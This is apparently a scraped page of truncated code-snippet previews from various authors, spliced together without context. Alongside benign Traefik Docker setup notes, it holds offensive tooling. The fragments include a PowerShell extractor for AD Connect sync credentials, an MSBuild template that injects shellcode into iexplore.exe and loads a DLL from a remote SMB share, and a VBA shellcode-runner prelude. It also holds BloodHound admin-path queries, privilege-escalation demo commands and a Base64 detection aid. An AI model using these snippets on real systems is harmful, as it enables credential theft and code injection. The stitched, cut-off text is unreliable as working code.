ismailyenigul

## Trafik Multi Network Deployment

1. Create Traefik network

` # docker network  create --driver=bridge --attachable --internal=false traefik `

2. Edit `traefik2/docker-compose.yml`
    - Change ACME email
    - Change --providers.docker.network=traefik value if you created different network then `traefik`

xpn

Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

rvrsh3ll

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>

rasta-mouse

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

Mau5Machine

  
version: "3.3"

services:
  ################################################
  ####        Traefik Proxy Setup           #####
  ###############################################
  traefik:
    image: traefik:v2.0
    restart: always

Neo23x0

Base64 Patterns - Learning Aid

Base64 Code	Mnemonic Aid	Decoded*	Description
JAB	🗣 Jabber	$.	Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq	📺 Television	MZ	MZ header
SUVY	🚙 SUV	IEX	PowerShell Invoke Expression
SQBFAF	🐣 Squab favorite	I.E.	PowerShell Invoke Expression (UTF-16)
SQBuAH	🐣 Squab uahhh	I.n.	PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA	💪 "Pah!"	<.	Often used by Emotet (UTF-16)

magisterquis

Link to the slides: https://docs.google.com/presentation/d/1D5_68h5EgEYCRDh_gpVRUc22xazUf5s0u7wBK_C8zkQ
Speakers' twitter handles: @fin_ack      (Fernando)
                           @magisterquis (Stuart)

Commands executed during the demo:

ssh -v [email protected]
ps awwwfux
egrep -A1 '^[sudo]{4}' .*history
sudo -l

monoxgas

' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&

leechristensen

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

jeffmcjunkin

MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH 
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,